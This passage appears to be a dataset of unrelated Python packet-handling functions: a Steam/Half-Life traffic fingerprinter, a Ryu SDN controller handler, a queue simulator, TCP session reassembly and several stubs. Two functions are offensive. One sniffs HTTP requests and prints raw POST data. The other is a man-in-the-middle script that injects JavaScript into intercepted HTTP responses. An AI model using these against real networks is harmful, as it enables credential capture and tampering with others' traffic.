-1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif 
(Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n 
arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + 
str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. 
Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + 
str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def handle_packet(self, packet):\n raise serial.threaded.NotImplementedError(\n 'please implement functionality in handle_packet')", "def _process_packet(node: int, packet: Packet, system: System, params: Params,\n records: Records):\n time_now = system.time\n packet.arrived[node] = time_now\n\n # If server is ready, start serving. Otherwise, push the packet into\n # the queue. 
If the queue was full, mark the packet is being dropped\n # for further analysis.\n server = system.get_server(node)\n queue = system.get_queue(node)\n if server.ready:\n # start serving immediately\n server.serve(packet)\n packet.service_started[node] = time_now\n system.schedule(Event.SERVICE_END, params.services[node](), node)\n records.get_system_size(node).add(time_now, system.get_size(node))\n\n elif queue.push(packet):\n # packet was queued\n records.get_system_size(node).add(time_now, system.get_size(node))\n\n else:\n # mark packet as being dropped\n packet.was_dropped = True\n packet.drop_node = node\n packet.drop_time = time_now", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def callback(self, packet, sender=None):\n pass", "def post_process(self, packet: 'dict[str, Any]') -> 'MPTCP':\n ret = self.data\n\n ret.option = Enum_Option.Multipath_TCP\n ret.length = self.test['length']\n ret.subtype = Enum_MPTCPOption.get(packet['test']['subtype'])\n\n return ret", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def handle_packet_received(self, packet):\r\n log.debug(packet)\r\n self._process_packet(packet)\r\n self.emit(packet.fctype, packet)\r\n self.emit(FCTYPE.ANY, packet)", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n port = msg.match['in_port']\n gateway = self.gateway_get(datapath.id)\n\n if gateway is None:# or gateway.idc_id != CONF.idc_id:\n return\n\n pkt = packet.Packet(msg.data)\n pkt_ethernet = pkt.get_protocol(ethernet.ethernet)\n\n if not pkt_ethernet:\n LOG.info(_LI(\"drop non-ethernet packet\"))\n return\n\n pkt_arp = pkt.get_protocol(arp.arp)\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n\n if pkt_arp:\n self.packet_arp.run(msg, pkt_ethernet, pkt_arp, gateway)\n elif pkt_ipv4:\n pkt_tp = pkt.get_protocol(tcp.tcp) or \\\n 
pkt.get_protocol(udp.udp) or \\\n pkt.get_protocol(icmp.icmp)\n\n if pkt.get_protocol(icmp.icmp):\n LOG.error(\"packet-in msg %s %s %s from %s\", datapath.id, pkt_ipv4, pkt_tp, port)\n LOG.debug(\"packet-in msg %s %s %s from %s\", \n datapath.id, pkt_ipv4, pkt_tp, port)\n\n if pkt_tp and port:\n self.packet_ipv4.run(msg, pkt_ethernet, pkt_ipv4, pkt_tp, gateway)\n else:\n LOG.debug(_LI(\"drop non-arp and non-ip packet\"))", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"[+] Processing Packet...\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n print(\"[+] Request !!!!!\")\n if \"Accept-Encoding:\" in load:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\",\"\",load)\n elif scapy_packet[scapy.TCP].sport == 80:\n print(\"[+] Response !!!!!\")\n injection_code = \"<script>alert('Shubhi');</script>\"\n load = scapy_packet[scapy.Raw].load.replace(\"</body>\",injection_code+\"</body>\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\",load)\n if content_length_search:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length)+len(injection_code)\n load = load.replace(content_length,str(new_content_length))\n if load!=scapy_packet[scapy.Raw].load:\n scapy_packet = set_load(scapy_packet, load)\n packet.set_payload(str(scapy_packet))\n scapy_packet.show()\n packet.accept()", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n self.do_final(packet, packet_in, event.port, event.dpid)", "def handle_packet(self, packet, ip_proto=None):\n logger.info('Packet data - [%s]', packet.summary())\n return False", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def handle_packet(self, packet):\n if not self.__validate_received_packet(packet):\n return\n packet_type = packet.get_type()\n log(f'Packet of type {packet_type.name} received.')\n if self.reunion_mode == ReunionMode.FAILED:\n if packet_type == PacketType.ADVERTISE:\n self.__handle_advertise_packet(packet)\n return\n if packet_type == PacketType.MESSAGE:\n self.__handle_message_packet(packet)\n elif packet_type == PacketType.ADVERTISE:\n self.__handle_advertise_packet(packet)\n elif packet_type == PacketType.JOIN:\n self.__handle_join_packet(packet)\n elif packet_type == PacketType.REGISTER:\n self.__handle_register_packet(packet)\n elif packet_type == PacketType.REUNION:\n self.__handle_reunion_packet(packet)", "def post_process(self, packet: 'dict[str, Any]') -> 'SMFDPDOption':\n ret = self.data\n return ret", "def handle_packet(self, srcif, packet) -> bool:\n typeOfPacket = packet[\"type\"]\n if typeOfPacket == DATA:\n return self.forward(srcif, packet)\n elif typeOfPacket == DUMP:\n return self.dump(packet)\n elif typeOfPacket == UPDT:\n return self.update(srcif, packet)\n elif typeOfPacket == RVKE:\n return self.revoke(packet)\n else:\n return False", "def SendPacketToReceiver(self, packet):\n self.network_simulator.SendToReceiver(packet)", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = 
dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( 